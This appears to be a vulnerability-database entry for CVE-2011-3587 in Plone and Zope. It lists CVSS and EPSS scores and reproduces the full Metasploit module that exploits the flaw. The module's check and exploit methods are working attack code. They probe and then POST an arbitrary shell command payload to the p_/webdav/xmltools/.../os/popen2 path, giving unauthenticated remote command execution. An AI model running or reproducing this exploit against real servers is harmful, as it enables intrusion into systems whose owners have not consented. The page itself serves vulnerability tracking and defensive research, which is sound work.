Lucene search

Unknown, Nick Miles, TecR0c <[email protected]>MSF:EXPLOIT-MULTI-HTTP-PLONE_POPEN2-

HistoryDec 27, 2011 - 6:59 a.m.

Plone and Zope XMLTools Remote Command Execution

2011-12-2706:59:26

Unknown, Nick Miles, TecR0c <[email protected]>

www.rapid7.com

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

EPSS

0.967

Percentile

99.7%

JSON

Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute arbitrary commands via vectors related to the p_ class in OFS/misc_.py and the use of Python modules.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Plone and Zope XMLTools Remote Command Execution',
      'Description'    => %q{
        Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x
        through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute
        arbitrary commands via vectors related to the p_ class in OFS/misc_.py and
        the use of Python modules.

      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',              # Plone Security Team, original vulnerability discovery
          'Nick Miles',           # Original exploit
          'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2011-3587'],
          ['OSVDB', '76105'],
          ['EDB', '18262'],
          ['URL', 'http://plone.org/products/plone/security/advisories/20110928']
        ],
      'Privileged'     => false,
      'Payload'        =>
      {
        'Compat'     =>
        {
          'PayloadType'  => 'cmd',
          'RequiredCmd'  => 'generic telnet perl ruby python',
        }
      },
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      'Targets'        => [['Automatic',{}]],
      'DisclosureDate' => '2011-10-04',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('URI',[true, "The path to the Plone installation", "/"]),
      ])
    register_autofilter_ports([ 8080 ])
  end

  def check
    uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')

    res = send_request_raw(
      {
        'uri'       => uri
      }, 25)
    if (res.headers['Bobo-Exception-Type'].to_s =~ /zExceptions.BadRequest/)
      return Exploit::CheckCode::Appears
    end
    # patched == zExceptions.NotFound
    return Exploit::CheckCode::Safe
  end

  def exploit
    uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')

    send_request_cgi(
      {
        'method'    => 'POST',
        'uri'       => uri,
        'vars_post' =>
          {
            'cmd' => payload.encoded,
          }
      }, 0.5) # short timeout, we don't care about the response
  end
end